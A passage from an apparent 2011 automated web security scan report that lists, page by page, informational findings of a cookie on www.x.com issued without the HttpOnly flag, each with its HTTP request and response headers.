Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333337343b3130322c333235313b3130322c333432363b3130322c333337353b3130322c333433313b3130322c333432373b3130322c333434333b3130322c333439313b3130322c333434343b3130322c333536313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:56 GMT; Path=/
Vary: User-Agent
JP: D=102916 t=1313157236205992
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.127. https://www.x.com/docs/DOC-3375  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3375

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3375 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:54 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333337353b3130322c333432373b3130322c333434333b3130322c333433313b3130322c333432363b3130322c333439313b3130322c333434343b3130322c333536313b3130322c333536323b3130322c333631393b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:54 GMT; Path=/
Vary: User-Agent
JP: D=172605 t=1313157234881833
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.128. https://www.x.com/docs/DOC-3426  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3426

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3426 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:53 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333432363b3130322c333434343b3130322c333434333b3130322c333439313b3130322c333536313b3130322c333432373b3130322c333536323b3130322c333631393b3130322c333638383b3130322c333831323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:53 GMT; Path=/
Vary: User-Agent
JP: D=177923 t=1313157233753621
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.129. https://www.x.com/docs/DOC-3427  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3427

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3427 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333432373b3130322c333434333b3130322c333439313b3130322c333536313b3130322c333434343b3130322c333536323b3130322c333631393b3130322c333638383b3130322c333831323b3130322c333834313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:53 GMT; Path=/
Vary: User-Agent
JP: D=115565 t=1313157233228654
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.130. https://www.x.com/docs/DOC-3431  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3431

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3431 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:53 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333433313b3130322c333434343b3130322c333432363b3130322c333432373b3130322c333434333b3130322c333439313b3130322c333536313b3130322c333536323b3130322c333631393b3130322c333638383b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:54 GMT; Path=/
Vary: User-Agent
JP: D=173915 t=1313157234152384
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.131. https://www.x.com/docs/DOC-3443  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3443

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3443 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333434333b3130322c333631393b3130322c333638383b3130322c333439313b3130322c333536313b3130322c333434343b3130322c333536323b3130322c333831323b3130322c333834313b3130322c313631333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:52 GMT; Path=/
Vary: User-Agent
JP: D=98914 t=1313157232773548
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.132. https://www.x.com/docs/DOC-3444  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3444

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3444 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:51 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333434343b3130322c333536313b3130322c333631393b3130322c333638383b3130322c333831323b3130322c333536323b3130322c333834313b3130322c313631333b3130322c313035313b3130322c313033313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:51 GMT; Path=/
Vary: User-Agent
JP: D=100315 t=1313157231659068
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.133. https://www.x.com/docs/DOC-3491  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3491

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3491 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333439313b3130322c333631393b3130322c333434343b3130322c333638383b3130322c333536313b3130322c333536323b3130322c333831323b3130322c333834313b3130322c313631333b3130322c313035313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:52 GMT; Path=/
Vary: User-Agent
JP: D=218057 t=1313157232304538
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.134. https://www.x.com/docs/DOC-3561  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3561

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3561 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333536313b3130322c333834313b3130322c333638383b3130322c333631393b3130322c333536323b3130322c313631333b3130322c333831323b3130322c313035313b3130322c313033313b3130322c313337323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:51 GMT; Path=/
Vary: User-Agent
JP: D=135641 t=1313157231234077
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.135. https://www.x.com/docs/DOC-3562  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3562

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3562 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333536323b3130322c333638383b3130322c333834313b3130322c333831323b3130322c313033313b3130322c313035313b3130322c333631393b3130322c313631333b3130322c313337323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:50 GMT; Path=/
Vary: User-Agent
JP: D=175892 t=1313157230683229
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.136. https://www.x.com/docs/DOC-3619  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3619

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3619 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333631393b3130322c313631333b3130322c333831323b3130322c333834313b3130322c313035313b3130322c313033313b3130322c333638383b3130322c313337323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:50 GMT; Path=/
Vary: User-Agent
JP: D=123460 t=1313157230328400
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.137. https://www.x.com/docs/DOC-3688  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3688

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3688 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333638383b3130322c333831323b3130322c333834313b3130322c313631333b3130322c313033313b3130322c313035313b3130322c313337323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:49 GMT; Path=/
Vary: User-Agent
JP: D=147682 t=1313157229798103
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.138. https://www.x.com/docs/DOC-3811  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3811

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3811 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/ppx/xspaces?view=documents
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b332c3133343430323b332c3133393730313b332c3132323335343b332c3134303635343b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:39:54 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c333831313b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b332c3133343430323b332c3133393730313b332c3132323335343b332c3134303635343b; Expires=Sun, 11-Sep-2011 13:39:54 GMT; Path=/
Vary: User-Agent
JP: D=104592 t=1313156394128506
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.139. https://www.x.com/docs/DOC-3812  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3812

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3812 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333831323b3130322c313033313b3130322c313631333b3130322c313035313b3130322c313337323b3130322c333834313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:49 GMT; Path=/
Vary: User-Agent
JP: D=97831 t=1313157229433265
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.140. https://www.x.com/docs/DOC-3836  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3836

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3836 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:05 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333833363b3130322c323234313b3130322c333230313b3130322c313535313b3130322c333237313b3130322c333332313b3130322c333332323b3130322c333335313b3130322c333335323b3130322c333335333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:05 GMT; Path=/
Vary: User-Agent
JP: D=194903 t=1313157245590892
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.141. https://www.x.com/docs/DOC-3841  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3841

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3841 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:48 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333834313b3130322c333831323b3130322c313033313b3130322c313337323b3130322c313035313b3130322c313631333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:49 GMT; Path=/
Vary: User-Agent
JP: D=198718 t=1313157228930468
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.142. https://www.x.com/message/186684  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/186684

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/186684 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:39 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c34363935333b312c35333838343b312c34393435343b312c35343036353b312c35333937373b312c34373636333b312c35343035383b312c35333135383b312c35333137323b312c35333235323b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:40 GMT; Path=/
Vary: User-Agent
JP: D=137098 t=1313157519959178
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.143. https://www.x.com/message/198017  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/198017

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/198017 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:38 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c34393435343b312c35333937373b312c35343036353b312c35343035383b312c35333838343b312c34373636333b312c35333135383b312c35333137323b312c35333235323b312c35333331323b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:39 GMT; Path=/
Vary: User-Agent
JP: D=113649 t=1313157519428788
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.144. https://www.x.com/message/211333  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/211333

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/211333 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:35 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333135383b312c35333137323b312c35333235323b312c35333331393b312c35333331323b312c35333037353b312c35333334333b312c35333539323b312c35333437393b312c35333631303b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:36 GMT; Path=/
Vary: User-Agent
JP: D=58458 t=1313157516498640
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.145. https://www.x.com/message/211439  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/211439

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/211439 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:35 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333137323b312c35333235323b312c35333334333b312c35333331393b312c35333331323b312c35333037353b312c35333539323b312c35333437393b312c35333631303b312c35333631393b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:36 GMT; Path=/
Vary: User-Agent
JP: D=102902 t=1313157516178631
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.146. https://www.x.com/message/211738  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/211738

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/211738 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
